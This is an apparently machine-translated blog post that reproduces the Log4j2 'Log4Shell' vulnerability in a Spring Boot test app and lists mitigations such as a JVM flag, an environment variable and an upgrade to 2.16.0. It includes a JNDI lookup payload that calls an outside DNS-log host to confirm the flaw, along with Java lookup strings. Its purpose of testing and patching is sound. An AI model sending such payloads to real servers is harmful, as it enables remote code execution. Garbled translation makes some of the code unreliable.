At 20:54 on 9 December 2021, Log4j has exploded a “nuclear bomb” vulnerability, which can execute arbitrary code directly and take over the target server at a very low cost. The potential severity and impact of this vulnerability is the highest this year. So far, the Log4j2 “nuclear bomb” vulnerability has affected more than 60,000 open source software and more than 300,000 open source software packages worldwide. Elasticsearch, SpringFramework, Druid, Spring Cloud Alibaba, Skywalking, Sentinel, MyBatis, HikariCP, Zipkin, MyBatis-Plus. This vulnerability does not exclude other ways to use, the subsequent official patch waiting.
Engineering construction and environment
pom.xml
<parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.6.1</version> </parent> <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-logging</artifactId> </exclusion> </exclusions> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-log4j2</artifactId> < version > 2.1.1. RELEASE < / version > < / dependency > < / dependencies >Copy the code
Java environment jdk1.8
Java(TM) SE Runtime Environment 18.9 (Build 11.0.13+10-LTS-370) Java HotSpot(TM) 64-bit Server VM 18.9 (Build 11.0.13+10-LTS-370, mixed mode)Copy the code
Web Interface writing
@RestController public class TestController { private static final Logger logger = LogManager.getLogger(TestController.class); /** * ${Java :vm} Java HotSpot(TM) 64-bit Server VM (Build 25.162-B12, mixed mode) * <p> * <p> * http://www.dnslog.cn/ * ${jndi:ldap://7yqrz4.dnslog.cn} * * @param str * @return */ @PostMapping("/test") public String test(@RequestBody String str) { logger.info("str={}", str); return "return=" + str; }}Copy the code
Loopholes in the test
Java: Why does the VM print? The debug check, path: org. Apache. Logging. Log4j. Core. The lookup. JavaLookup# lookup
Find a number of key, one by one try:
${Java: VM} Java HotSpot(TM) 64-Bit Server VM (build 25.162-B12, mixed mode) ${Java :locale} default locale: zh_CN, platform encoding: UTF-8 ${java:hw} processors: 4, architecture: X86_64-64 ${Java: OS} Mac OS X 10.14.6 Unknown, Architecture: X86_64 ${Java :version} Java version 1.8.0_162 ${Java: Runtime} Java(TM) SE Runtime Environment (build 1.8.0_162-B12) x86_64 ${Java :version} Java version 1.8.0_162 ${Java: Runtime} Java(TM) SE Runtime Environment (build 1.8.0_162-B12) from Oracle CorporationCopy the code
DNSLog www.dnslog.cn/
Apache Log4j 2.x <= 2.14.1
- The JVM parameter – Dlog4j2. FormatMsgNoLookups = true
- Modify the configuration log4j2. FormatMsgNoLookups = True
- The system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS is set to true
- Upgrade > = 2.16.0 mvnrepository.com/artifact/or…
- If it depends on spring-boot-starter-log4j2
pom.xml <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-log4j2</artifactId> < version > 2.1.1. RELEASE < / version > <! Log4j </groupId> <artifactId> log4J-api </artifactId> </exclusion> <exclusion> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> </exclusion> </exclusions> </dependency> <! Log4j </groupId> <artifactId>log4j-api</artifactId> < version > 2.16.0 < / version > < / dependency > < the dependency > < groupId > org. Apache. Logging. Log4j < / groupId > < artifactId > log4j - core < / artifactId > < version > 2.16.0 < / version > < / dependency >Copy the code
reference
apache log4j lookups
Apache Log4j CVE